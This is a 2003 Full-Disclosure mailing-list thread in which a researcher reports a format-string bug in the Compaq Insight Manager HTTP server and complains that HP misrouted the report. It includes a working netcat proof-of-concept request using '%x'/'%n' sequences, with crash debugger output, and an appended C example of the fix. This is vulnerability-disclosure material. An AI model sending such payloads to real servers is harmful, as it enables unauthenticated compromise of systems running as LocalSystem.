> Not for [EMAIL PROTECTED] Please make sure appropriate
> HP organization replies to the customer:
>
> [EMAIL PROTECTED]
>
>
> Yours truly,
> SOFTWARE SECURITY RESPONSE TEAM (SSRT)
> Hewlett-Packard Company
> HP Services .....

Okay, so this formatstring bug in WBEM Web server is not a Security issue?

You can test it on your own, nearest production server or client, no matter
what box you test this on, only one thing, it _must_ have Compaq Insight
Manager installed.
(Hint: You don't need any login/password, as this issue is in the Web server)

I give a shit about this bug, I was only informing you about it, but if this
sick mailing continues every time I report a SECURITY issue I have found to
you, I'll never bother you again and only post it to Full-Disclosure list..

(Same crap as last time... gah)

Have a nice day
/bashis

>
>
>
> Dear Compaq Customer,
>
>
> It would help me to provide you with an accurate solution, if you could
> provide the following additional details:
>
> * The name and model of your Compaq product, for example: Presario
> 5400.
> * The hardware or software that has been installed recently.
> * The serial number. The serial number can be found on a sticker
> attached to the side of your computer.
> * The exact error message you received and the events that led to
> the error (i.e., whether the error message was received after a
> program was installed.)
> * The operating system installed on the computer (for example: Windows
> 98.)
>
> With the above information, I will be able to investigate the issue
> further and provide you with a solution.
>
> Thank you for taking the time to contact us. Please reply if I can be
> of further assistance.
>
> Regards,
>
> Suresh Babu Sharath
> HP Consumer eSupport
>
> For additional or future service assistance, you can post your question
> to the Customer Communities at: http://www.compaq.com/communities
>
> "Our advice is strictly limited to the question(s) asked and is based on
> the information provided to us. HP does not assume any responsibility
> or liability for the advice given and shall not be liable for any
> direct, indirect, special, incidental or consequential damages in
> connection with the use of this information. Always back up your data.
> For more information, including technical information updates, please
> visit our Web site at http://www.hp.com/go/support."
>
>
> Original Message Follows:
> -------------------------
>
> This message has been rerouted to you by the HP.COM email router. If
> this message has been sent to you in error, please forward back to the
> email router mailbox at REROUTER,HPCOM per HP email directory or HPCOM
> REROUTER per CPQ email directory.
> Original message follows:
> -------------------------
>
>
>
> Not for [EMAIL PROTECTED] Please make sure appropriate
> HP organization replies to the customer:
>
> [EMAIL PROTECTED]
>
>
> Yours truly,
> SOFTWARE SECURITY RESPONSE TEAM (SSRT)
> Hewlett-Packard Company
> HP Services
>
> ------- Forwarded Message
>
> Date: Sun, 03 Aug 2003 17:03:43 +0200
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> cc: [EMAIL PROTECTED]
> Subject: formatstring bug in Compaq HTTP Servers
>
> Hi there
>
> There is a formatstring bug in Compaq HTTP Servers.
> [in <!.DebugSearchPaths>?Url=> requests]
>
> The HTTP server runs with LocalSystem account.
>
> Versions:
> All versions I have tested had this formatstring bug.
>
> To be sure that it wasn't already fixed, I downloaded this new
> version..
> Insight Management Agent
> Version: 5.00 H (01/17/2003)
>
> http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022
>
> Request:
> $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print
> "A"x14'`BBBB`perl -e
> 'print
> ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
>
> Result:
> 0:005> g
> (9a8.934): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0
> edi=00000800
> eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na
> po nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
> efl=00010246
> MSVCRT!setvbuf+65d:
> 780127a8 8908 mov [eax],ecx
> ds:0023:42424242=????????
> *** WARNING: Unable to verify checksum for
> C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1
> \CpqHMMO.dll
> *** ERROR: Symbol file could not be found. Defaulted to export symbols
> for C:PROGRA~1\Compaq
> \COMPAQ~1\CPQWEB~1\CpqHMMO.dll -
>
> Have a nice day
> /bashis
>
>
> ------- End of Forwarded Message
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
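
Added example, not part of the original thread and not HP's code: a C sketch of the defect class the report describes (request data used as a printf-family format string) next to its fix, plus a strict check for '%' bytes that are not valid URL escapes, which is how the ".%x" and "%n" sequences in the reported request appear on the wire. The function names and the "Url=%s" diagnostic line are hypothetical, and the sample values are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count '%' bytes that do not begin a well-formed URL escape (%HH).
 * The raw ".%x" and "%n" sequences in the reported request all count. */
size_t count_bad_percent(const char *s)
{
    size_t bad = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (isxdigit((unsigned char)s[i + 1]) &&
            isxdigit((unsigned char)s[i + 2]))
            i += 2;                 /* valid escape, skip both hex digits */
        else
            bad++;
    }
    return bad;
}

/* Hypothetical handler step: build a diagnostic line from the Url value.
 * Vulnerable shape (not compiled here): snprintf(out, n, url);
 * Fixed shape: request data is only ever an argument to a constant format.
 * Returns 0 on success, -1 if the value is rejected or would be truncated. */
int render_search_path(char *out, size_t n, const char *url)
{
    if (count_bad_percent(url) != 0)
        return -1;                  /* malformed escapes: refuse the request */
    int w = snprintf(out, n, "Url=%s", url);
    return (w < 0 || (size_t)w >= n) ? -1 : 0;
}

int main(void)
{
    /* Constructed sample values, shortened from the pattern in the report. */
    const char *samples[] = { "AAAABBBB.%x.%x%n", "docs%2Findex", "%c0" };
    char line[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = render_search_path(line, sizeof line, samples[i]);
        printf("%-18s bad=%zu -> %s\n", samples[i],
               count_bad_percent(samples[i]), rc == 0 ? line : "rejected");
    }
    return 0;
}
```

The "%c0" sample passes the escape check because it is a well-formed %HH sequence, yet it would still be read as a conversion if the value were used as the format; the constant format string is the fix, and the escape check is only an extra layer.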
